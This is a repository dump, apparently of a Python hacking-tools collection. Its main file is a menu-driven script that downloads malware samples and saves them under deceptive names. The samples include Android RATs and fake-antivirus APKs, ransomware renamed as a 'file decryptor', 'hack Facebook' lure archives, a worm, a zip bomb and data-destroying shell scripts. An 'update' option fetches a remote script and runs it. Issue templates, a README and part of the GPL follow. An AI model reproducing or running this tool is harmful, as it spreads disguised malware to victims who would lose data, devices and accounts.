chunk_size = 1024 498 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/crd.apk?raw=true' 499 | r = requests.get(url, stream = True) 500 | size = int(r.headers['content-length']) 501 | filename = url.split('/')[-1] 502 | with open(filename, 'wb') as f: 503 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 504 | f.write(data) 505 | os.system("mv 'crd.apk?raw=true' Android/Crd.apk") 506 | print(fun)#####done 507 | 508 | elif menu1 == 35:####done 509 | print(""+G+"") 510 | chunk_size = 1024 511 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/dendroid.apk?raw=true' 512 | r = requests.get(url, stream = True) 513 | size = int(r.headers['content-length']) 514 | filename = url.split('/')[-1] 515 | with open(filename, 'wb') as f: 516 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 517 | f.write(data) 518 | os.system("mv 'dendroid.apk?raw=true' Android/Dendroid.apk") 519 | print(fun)#####done 520 | 521 | elif menu1 == 36:####done 522 | print(""+G+"") 523 | chunk_size = 1024 524 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ds.apk?raw=true' 525 | r = requests.get(url, stream = True) 526 | size = int(r.headers['content-length']) 527 | filename = url.split('/')[-1] 528 | with open(filename, 'wb') as f: 529 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 530 | f.write(data) 531 | os.system("mv 'ds.apk?raw=true' Android/Ds.apk") 532 | print(fun)#####done 533 | 534 | elif menu1 == 37:####done 535 | print(""+G+"") 536 | chunk_size = 1024 537 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/facebook.apk?raw=true' 538 | r = requests.get(url, stream = True) 539 | size = int(r.headers['content-length']) 540 | filename = url.split('/')[-1] 541 | with open(filename, 'wb') as f: 542 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 543 | f.write(data) 544 | os.system("mv 'facebook.apk?raw=true' Android/Facebook.apk") 545 | print(fun)#####done 546 | 547 | elif menu1 == 38:####done 548 | print(""+G+"") 549 | chunk_size = 1024 550 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Fake_av.apk?raw=true' 551 | r = requests.get(url, stream = True) 552 | size = int(r.headers['content-length']) 553 | filename = url.split('/')[-1] 554 | with open(filename, 'wb') as f: 555 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 556 | f.write(data) 557 | os.system("mv 'Fake_av.apk?raw=true' Android/Fakeav.apk") 558 | print(fun)#####done 559 | 560 | elif menu1 == 39:####done 561 | print(""+G+"") 562 | chunk_size = 1024 563 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ArtStation.apk?raw=true' 564 | r = requests.get(url, stream = True) 565 | size = int(r.headers['content-length']) 566 | filename = url.split('/')[-1] 567 | with open(filename, 'wb') as f: 568 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 569 | f.write(data) 570 | os.system("mv 'ArtStation.apk?raw=true' Android/ArtStation.apk") 571 | print(fun)#####done 572 | 573 | elif menu1 == 40:####done 574 | print(""+G+"") 575 | chunk_size = 1024 576 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Adware.apk?raw=true' 577 | r = requests.get(url, stream = True) 578 | size = int(r.headers['content-length']) 579 | filename = url.split('/')[-1] 580 | with open(filename, 'wb') as f: 581 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 582 | f.write(data) 583 | os.system("mv 'Adware.apk?raw=true' Android/MusicPlayerAdware.apk") 584 | print(fun)#####done 585 | 586 | elif menu1 == 41:####done 587 | print(""+G+"") 588 | chunk_size = 1024 589 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Settings.apk?raw=true' 590 | r = requests.get(url, stream = True) 591 | size = int(r.headers['content-length']) 592 | filename = url.split('/')[-1] 593 | with open(filename, 'wb') as f: 594 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 595 | f.write(data) 596 | os.system("mv 'Settings.apk?raw=true' Android/Settings.apk") 597 | print(fun)#####done 598 | 599 | elif menu1 == 42:####done 600 | print("\n") 601 | menu() 602 | else: 603 | print(""+R+"[!] wrong number") 604 | except Exception: 605 | print(""+R+"[!] This is not number") 606 | #################ANDROID DONE 607 | 608 | #################Start Macosx 609 | def Vmacosx(): 610 | print(""+O+"["+R+"1"+O+"] Trinoids") 611 | print(""+O+"["+R+"2"+O+"] Nothing") 612 | print(""+O+"["+R+"3"+O+"] Back") 613 | 614 | try: 615 | menu2 = input("Input number > "+R+"") 616 | if menu2 == 1: 617 | print(""+G+"") 618 | chunk_size = 1024 619 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/trinoids.app?raw=true' 620 | r = requests.get(url, stream = True) 621 | size = int(r.headers['content-length']) 622 | filename = url.split('/')[-1] 623 | with open(filename, 'wb') as f: 624 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 625 | f.write(data) 626 | os.system("mv 'trinoids.app?raw=true' Macosx/Trinoids.app") 627 | print(fun)#####done 628 | 629 | elif menu2 == 2: 630 | print(""+G+"") 631 | chunk_size = 1024 632 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/nothing.app?raw=true' 633 | r = requests.get(url, stream = True) 634 | size = int(r.headers['content-length']) 635 | filename = url.split('/')[-1] 636 | with open(filename, 'wb') as f: 637 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 638 | f.write(data) 639 | os.system("mv 'nothing.app?raw=true' Macosx/Nothing.app") 640 | print(fun)#####done 641 | elif menu2 == 3: 642 | print("\n") 643 | menu() 644 | else: 645 | print(""+R+"[!] wrong number") 646 | except Exception: 647 | print(""+R+"[!] This is not number") 648 | ####################Done Macosx 649 | 650 | ###################Start PC 651 | def vpcwin(): 652 | print(""+O+"["+R+"1"+O+"] Ugly.bat\t\t["+R+"5"+O+"] Koce.bat\t\t["+R+"9"+O+"] Ransomeware") 653 | print(""+O+"["+R+"2"+O+"] Sleepy.bat\t\t["+R+"6"+O+"] Cmd.bat\t\t["+R+"10"+O+"] Rip.bat") 654 | print(""+O+"["+R+"3"+O+"] Reg-eater.bat\t["+R+"7"+O+"] Capslock.vbs\t["+R+"11"+O+"] Back") 655 | print(""+O+"["+R+"4"+O+"] Kuis.bat\t\t["+R+"8"+O+"] Alay.vbs") 656 | 657 | try: 658 | menu3 = input("Input number > "+R+"") 659 | if menu3 == 1: 660 | print(""+G+"") 661 | chunk_size = 1024 662 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ugly.bat?raw=true' 663 | r = requests.get(url, stream = True) 664 | size = int(r.headers['content-length']) 665 | filename = url.split('/')[-1] 666 | with open(filename, 'wb') as f: 667 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 668 | f.write(data) 669 | os.system("mv 'ugly.bat?raw=true' Windows/Ugly.bat") 670 | print(fun)#####done 671 | 672 | elif menu3 == 2: 673 | print(""+G+"") 674 | chunk_size = 1024 675 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/sleepy.bat?raw=true' 676 | r = requests.get(url, stream = True) 677 | size = int(r.headers['content-length']) 678 | filename = url.split('/')[-1] 679 | with open(filename, 'wb') as f: 680 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 681 | f.write(data) 682 | os.system("mv 'sleepy.bat?raw=true' Windows/Sleepy.bat") 683 | print(fun)#####done 684 | 685 | elif menu3 == 3: 686 | print(""+G+"") 687 | chunk_size = 1024 688 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/reg-eater.bat?raw=true' 689 | r = requests.get(url, stream = True) 690 | size = int(r.headers['content-length']) 691 | filename = url.split('/')[-1] 692 | with open(filename, 'wb') as f: 693 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 694 | f.write(data) 695 | os.system("mv 'reg-eater.bat?raw=true' Windows/Reg-eater.bat") 696 | print(fun)#####done 697 | 698 | elif menu3 == 4: 699 | print(""+G+"") 700 | chunk_size = 1024 701 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/kuis.bat?raw=true' 702 | r = requests.get(url, stream = True) 703 | size = int(r.headers['content-length']) 704 | filename = url.split('/')[-1] 705 | with open(filename, 'wb') as f: 706 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 707 | f.write(data) 708 | os.system("mv 'kuis.bat?raw=true' Windows/Kuis.bat") 709 | print(fun)#####done 710 | 711 | elif menu3 == 5: 712 | print(""+G+"") 713 | chunk_size = 1024 714 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/koce.bat?raw=true' 715 | r = requests.get(url, stream = True) 716 | size = int(r.headers['content-length']) 717 | filename = url.split('/')[-1] 718 | with open(filename, 'wb') as f: 719 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 720 | f.write(data) 721 | os.system("mv 'koce.bat?raw=true' Windows/Koce.bat") 722 | print(fun)#####done 723 | 724 | elif menu3 == 6: 725 | print(""+G+"") 726 | chunk_size = 1024 727 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/cmd.bat?raw=true' 728 | r = requests.get(url, stream = True) 729 | size = int(r.headers['content-length']) 730 | filename = url.split('/')[-1] 731 | with open(filename, 'wb') as f: 732 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 733 | f.write(data) 734 | os.system("mv 'cmd.bat?raw=true' Windows/Cmd.bat") 735 | print(fun)#####done 736 | 737 | elif menu3 == 7: 738 | print(""+G+"") 739 | chunk_size = 1024 740 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/capslock.vbs?raw=true' 741 | r = requests.get(url, stream = True) 742 | size = int(r.headers['content-length']) 743 | filename = url.split('/')[-1] 744 | with open(filename, 'wb') as f: 745 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 746 | f.write(data) 747 | os.system("mv 'capslock.vbs?raw=true' Windows/Capslock.vbs") 748 | print(fun)#####done 749 | 750 | elif menu3 == 8: 751 | print(""+G+"") 752 | chunk_size = 1024 753 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/alay.vbs?raw=true' 754 | r = requests.get(url, stream = True) 755 | size = int(r.headers['content-length']) 756 | filename = url.split('/')[-1] 757 | with open(filename, 'wb') as f: 758 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 759 | f.write(data) 760 | os.system("mv 'alay.vbs?raw=true' Windows/Alay.vbs") 761 | print(fun)#####done 762 | 763 | elif menu3 == 9: 764 | print(""+G+"") 765 | chunk_size = 1024 766 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ransomeware.exe?raw=true' 767 | r = requests.get(url, stream = True) 768 | size = int(r.headers['content-length']) 769 | filename = url.split('/')[-1] 770 | with open(filename, 'wb') as f: 771 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 772 | f.write(data) 773 | os.system("mv 'ransomeware.exe?raw=true' Windows/RansomewareFileDecryptor.exe") 774 | print(fun)#####done 775 | 776 | elif menu3 == 10: 777 | print(""+G+"") 778 | chunk_size = 1024 779 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/RIP.bat?raw=true' 780 | r = requests.get(url, stream = True) 781 | size = int(r.headers['content-length']) 782 | filename = url.split('/')[-1] 783 | with open(filename, 'wb') as f: 784 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 785 | f.write(data) 786 | os.system("mv 'RIP.bat?raw=true' Windows/RIP.bat") 787 | print(fun)#####done 788 | elif menu3 == 11: 789 | print("\n") 790 | menu() 791 | else: 792 | print(""+R+"[!] wrong number") 793 | except Exception: 794 | print(""+R+"[!] This is not number") 795 | 796 | #######################Done PC 797 | 798 | ####################start PDF 799 | def Vpdfautorunpc(): 800 | print(""+O+"["+R+"1"+O+"] How to hack facebook (ext: rar)") 801 | print(""+O+"["+R+"2"+O+"] Hack facebook (ext: rar)") 802 | print(""+O+"["+R+"3"+O+"] Back") 803 | 804 | try: 805 | menu4 = input("Input Number >"+R+" ") 806 | if menu4 == 1: 807 | print(""+G+"") 808 | chunk_size = 1024 809 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/howtohackfb.rar?raw=true' 810 | r = requests.get(url, stream = True) 811 | size = int(r.headers['content-length']) 812 | filename = url.split('/')[-1] 813 | with open(filename, 'wb') as f: 814 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 815 | f.write(data) 816 | os.system("mv 'howtohackfb.rar?raw=true' Pdf-autorun-windows/How-to-hack-facebook.rar") 817 | print(fun)#####done 818 | print("password: cracker\n") 819 | elif menu4 == 2: 820 | print(""+G+"") 821 | chunk_size = 1024 822 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/hackfacebook.rar?raw=true' 823 | r = requests.get(url, stream = True) 824 | size = int(r.headers['content-length']) 825 | filename = url.split('/')[-1] 826 | with open(filename, 'wb') as f: 827 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 828 | f.write(data) 829 | os.system("mv 'hackfacebook.rar?raw=true' Pdf-autorun-windows/Hack-facebook.rar") 830 | print(fun)#####done 831 | print("password: cracker\n") 832 | elif menu4 == 3: 833 | print("\n") 834 | menu() 835 | else: 836 | print(""+R+"[!] Wrong number") 837 | except NameError: 838 | print(""+R+"[!] This is not number") 839 | except Exception as err: 840 | print(""+R+"[!] This is not number") 841 | 842 | ######################Done pdf 843 | 844 | ############Worm and Bomb zip 845 | def Vother(): 846 | print(""+O+"["+R+"1"+O+"] Worm.bat") 847 | print(""+O+"["+R+"2"+O+"] Bomb.zip") 848 | print(""+O+"["+R+"3"+O+"] Back") 849 | 850 | try: 851 | menu5 = input("Input number > "+R+"") 852 | if menu5 == 1: 853 | print(""+G+"") 854 | chunk_size = 1024 855 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/worm.bat?raw=true' 856 | r = requests.get(url, stream = True) 857 | size = int(r.headers['content-length']) 858 | filename = url.split('/')[-1] 859 | with open(filename, 'wb') as f: 860 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 861 | f.write(data) 862 | os.system("mv 'worm.bat?raw=true' Worm-and-Bombzip/worm.bat") 863 | print(fun)#####done 864 | 865 | elif menu5 == 2: 866 | print(""+G+"") 867 | chunk_size = 1024 868 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/bom-zip.zip?raw=true' 869 | r = requests.get(url, stream = True) 870 | size = int(r.headers['content-length']) 871 | filename = url.split('/')[-1] 872 | with open(filename, 'wb') as f: 873 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 874 | f.write(data) 875 | os.system("mv 'bom-zip.zip?raw=true' Worm-and-Bombzip/Bomb.zip") 876 | print(fun)#####done 877 | 878 | elif menu5 == 3: 879 | print("\n") 880 | menu() 881 | else: 882 | print(""+R+"[!] wrong number") 883 | except Exception: 884 | print(""+R+"[!] This is not number") 885 | 886 | ###############Start Shell Virus 887 | def Shellvirus(): 888 | print(""+O+"["+R+"1"+O+"] Data-Eater.sh") 889 | print(""+O+"["+R+"2"+O+"] Bootloop.sh") 890 | print(""+O+"["+R+"3"+O+"] Back") 891 | 892 | try: 893 | menu6 = input("Input number > "+R+"") 894 | if menu6 == 1: 895 | print(""+G+"") 896 | chunk_size = 1024 897 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/data-eater.sh?raw=true' 898 | r = requests.get(url, stream = True) 899 | size = int(r.headers['content-length']) 900 | filename = url.split('/')[-1] 901 | with open(filename, 'wb') as f: 902 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 903 | f.write(data) 904 | os.system("mv 'data-eater.sh?raw=true' Shell-virus/Data-Eater.sh") 905 | print(fun)#####done 906 | 907 | elif menu6 == 2: 908 | print(""+G+"") 909 | chunk_size = 1024 910 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/bootloop.sh?raw=true' 911 | r = requests.get(url, stream = True) 912 | size = int(r.headers['content-length']) 913 | filename = url.split('/')[-1] 914 | with open(filename, 'wb') as f: 915 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 916 | f.write(data) 917 | os.system("mv 'bootloop.sh?raw=true' Shell-virus/Bootloop.sh") 918 | print(fun)#####done 919 | elif menu6 == 3: 920 | print("\n") 921 | menu() 922 | else: 923 | print(""+R+"[!] wrong number") 924 | except Exception: 925 | print(""+R+"[!] This is not number") 926 | 927 | def banner2(): 928 | print(""+G+"Please do"+R+" NOT "+G+"use this tool for illegal activity") 929 | print(""+R+"[!] "+G+"Keep legal don't illegal "+R+" [!]"+O+"") 930 | def menu(): 931 | print("\n"+R+"[========== Menu ==========]"+O+"") 932 | print(""+O+"["+R+"1"+O+"] Android\t\t["+R+"4"+O+"] Pdf Autorun PC\t\t["+R+"7"+O+"] Update tool") 933 | print(""+O+"["+R+"2"+O+"] Macosx\t\t["+R+"5"+O+"] Other\t\t\t["+R+"8"+O+"] About") 934 | print(""+O+"["+R+"3"+O+"] Windows\t\t["+R+"6"+O+"] Shell\t\t\t["+R+"9"+O+"] Exit") 935 | try: 936 | menu = input("\nInput Number > "+R+"") 937 | if menu == 1: 938 | os.system("clear") 939 | Vandroid() 940 | elif menu == 2: 941 | os.system("clear") 942 | Vmacosx() 943 | elif menu == 3: 944 | os.system("clear") 945 | vpcwin() 946 | elif menu == 4: 947 | os.system("clear") 948 | Vpdfautorunpc() 949 | elif menu == 5: 950 | os.system("clear") 951 | Vother() 952 | elif menu == 6: 953 | os.system("clear") 954 | Shellvirus() 955 | elif menu == 7: 956 | os.system("clear") 957 | print(""+G+"") 958 | chunk_size = 1024 959 | url = 'https://github.com/Hider5/Malicious/blob/master/malicious.py?raw=true' 960 | r = requests.get(url, stream = True) 961 | size = int(r.headers['content-length']) 962 | filename = url.split('/')[-1] 963 | with open(filename, 'wb') as f: 964 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 965 | f.write(data) 966 | os.system("mv 'malicious.py?raw=true' malicious.py") 967 | os.system("python2 malicious.py") 968 | elif menu == 8: 969 | os.system("clear") 970 | about() 971 | elif menu == 9: 972 | fontcolor() 973 | os.system("clear") 974 | sys.exit() 975 | else: 976 | print(""+R+"[!] wrong number") 977 | except Exception: 978 | print(""+R+"[!] This is not number") 979 | 980 | if __name__ == "__main__": 981 | 982 | os.system("clear") 983 | banner() 984 | banner2() 985 | menu() 986 | fontcolor() 987 | sys.exit() 988 | 989 | 990 | 991 | -------------------------------------------------------------------------------- /Create Virus/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | tqdm -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Python_Tools 2 | Uppdatting---- 3 | # Thông tin liên hệ 4 | Facebook: fb.com/hoangmanhkhiem.IT 5 | -------------------------------------------------------------------------------- /Tool X/.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: "[Bug]" 5 | labels: bug 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Smartphone (please complete the following information):** 27 | - Device: [e.g. iPhone6] 28 | - OS: [e.g. iOS8.1] 29 | - Version [e.g. 22] 30 | 31 | **Additional context** 32 | Add any other context about the problem here. 33 | -------------------------------------------------------------------------------- /Tool X/.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: "[Feature]" 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | 13 | 14 | **Is your feature request related to a problem? Please describe.** 15 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 16 | 17 | **Describe the solution you'd like** 18 | A clear and concise description of what you want to happen. 19 | 20 | **Describe alternatives you've considered** 21 | A clear and concise description of any alternative solutions or features you've considered. 22 | 23 | **Additional context** 24 | Add any other context or screenshots about the feature request here. 25 | -------------------------------------------------------------------------------- /Tool X/.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__ -------------------------------------------------------------------------------- /Tool X/LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal 